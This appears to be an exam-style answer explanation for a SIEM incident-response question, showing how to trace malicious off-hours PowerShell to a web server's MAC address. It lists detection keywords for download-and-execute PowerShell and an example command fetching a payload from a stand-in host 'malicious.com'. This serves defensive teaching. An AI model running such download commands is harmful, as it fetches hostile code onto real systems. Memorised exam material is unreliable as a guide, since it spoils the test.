See the solution in Explanation.
Explanation:
To determine the physical address of the targeted web server, follow thesestep-by-step instructionsto analyze the logs in your SIEM system. The goal is to identify malicious PowerShell activity targeting the web server during the specified time window (12:00 AM to 1:00 AM on December 4, 2024).
Step 1: Understand the Context
* Scenario:Your SIEM has detected suspicious PowerShell activities during off-hours (12:00 AM to 1:00 AM).
* Objective:Identify the physical (MAC) address of the web server targeted by the malicious PowerShell commands.
Step 2: Identify Relevant Log Sources
* Logs to investigate:
* PowerShell logs (Event ID 4104)for command execution.
* Windows Security Event Logsfor login and access attempts.
* Network Traffic Logs(firewall or IDS/IPS) to detect connections made by PowerShell.
* Web Server Access Logsfor any unusual requests.
SIEM Log Sources:
* Windows Event Logs (Sysmon/PowerShell)
* Firewall Logs
* IDS/IPS Alerts
* Web Server Logs (IIS, Apache)
Step 3: Use SIEM Filters to Isolate Relevant Events
* Time Frame Filter:
* Set the time range from12:00 AM to 1:00 AMonDecember 4, 2024.
* Event ID Filter:
* Filter forEvent ID 4104(PowerShell script block logging).
* Command Pattern:
* Look for suspicious commands like:
Invoke-WebRequest
Invoke-Expression (IEX)
New-Object Net.WebClient
* Process Name:
* Filter logs where theProcess Nameis powershell.exe.
Example SIEM Query:
index=windows_logs
| search EventID=4104 ProcessName="powershell.exe"
| where _time between "2024-12-04T00:00:00" and "2024-12-04T01:00:00"
| table _time, ProcessName, CommandLine, SourceIP, DestinationIP, MACAddress Step 4: Correlate Events with Network Logs
* Once you identify PowerShell events, correlate them withnetwork traffic logs.
* Focus on:
* Source IP Address: Where the PowerShell commands originated.
* Destination IP Address: Targeted web server.
* Use theIP address of the web serverto trace back theMAC address.
Example Network Log Query:
index=network_logs
| search DestinationIP="<Web_Server_IP>"
| where _time between "2024-12-04T00:00:00" and "2024-12-04T01:00:00"
| table _time, SourceIP, DestinationIP, MACAddress, Protocol, Port
Step 5: Analyze the PowerShell Commands
* Investigate the nature of the commands:
* Data Exfiltration:Using Invoke-WebRequest to send data to external IPs.
* Remote Code Execution:Using IEX to run downloaded scripts.
* Cross-check commands against knownIndicators of Compromise (IOCs).
Step 6: Validate the Web Server's Physical Address
* Identify theMAC addresscorresponding to the targeted web server.
* Cross-reference withARP tables or DHCP logsto confirm the mapping between IP and MAC address.
Example ARP Command on Windows:
arp -a | findstr <Web_Server_IP>
Step 7: Report the Findings
* Document the targeted server'sIP address and MAC address.
* Summarize the malicious activity:
* Commands executed
* Time and duration
* Source and destination IPs
Example Finding:
Web Server IP: 192.168.1.50
Physical (MAC) Address: 00:1A:2B:3C:4D:5E
Time of Attack: 12:30 AM, December 4, 2024
PowerShell
Command: Invoke-WebRequest -Uri "http://malicious.com/payload"
Step 8: Take Immediate Actions
* Isolate the affected server.
* Block external IPs involved.
* Terminate malicious PowerShell processes.
* Conduct a forensic analysis of compromised systems.
Step 9: Strengthen Security Post-Incident
* Implement PowerShell Logging:Enable detailed script block and module logging.
* Enhance Network Monitoring:Set up alerts for unusual PowerShell activities.
* User Behavior Analytics (UBA):Detect anomalous login patterns outside working hours.